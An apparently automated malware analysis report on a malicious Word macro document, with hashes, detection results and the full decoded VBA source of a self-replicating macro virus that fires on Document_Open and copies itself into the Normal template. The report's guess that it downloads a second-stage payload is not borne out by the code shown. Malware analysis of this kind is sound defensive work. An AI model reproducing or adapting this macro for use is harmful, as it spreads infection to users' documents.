Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b9d88201c004cbee…

MALICIOUS

Office (OLE)

Size: 31.5 KB
Created: 2001-02-24 14:20:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 9a964de13366631def51012fcaeefc0c
SHA-1: 6f2aeb927973f34da2bed4cc31bcb82c3f919c51
SHA-256: b9d88201c004cbeefb932ef0dc75f6a2d5686ce05657a7e9f085f6711186f9f7
Risk Score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro appears to obfuscate its own code and potentially copy code from the NormalTemplate, suggesting an attempt to hide malicious functionality. The embedded URL and the ClamAV detection further indicate malicious intent, likely to download a second-stage payload.

Heuristics 4

  • ClamAV: Doc.Trojan.Hmc-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Hmc-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://bobo.tlsecurity.com (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1278 bytes
SHA-256: 8083946f740028b446a9e648eab1948e86fed388f60af797ece078fdc8291463
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dr_bobo_macro_word_db"
Private Sub Document_Open()

'Author:   Dr.Bobo [bobo.tlsecurity.com]
'Name:     Dr.Bobo.Macro.Word.db
'Origin:   Croatia [Hrvatska]

Dim Norm, NormCode, NormLines, Doc, DocCode, DocLines
Set Norm = NormalTemplate.VBProject.VBComponents(1)
Set Doc = ActiveDocument.VBProject.VBComponents(1)
Set DocCode = Doc.CodeModule: Set NormCode = Norm.CodeModule

If DocCode.lines(23, 1) = "" Then
    For y = 1 To DocCode.countoflines
DocCode.replacelines y, "Dr.Bobo.Macro.Word.db"
    Next y
    For x = 2 To NormCode.countoflines
DocCode.insertlines 26 + x, NormCode.lines(x, 1)
   Next x
End If

If NormCode.lines(23, 1) = "" Then
    For y = 1 To NormCode.countoflines
NormCode.replacelines y, "Dr.Bobo.Macro.Word.db"
    Next y
    For x = 1 To DocCode.countoflines
NormCode.insertlines 26 + x, DocCode.lines(x, 1)
    Next x
End If
End Sub

Private Sub Document_New()
End Sub

Private Sub Document_Close()
End Sub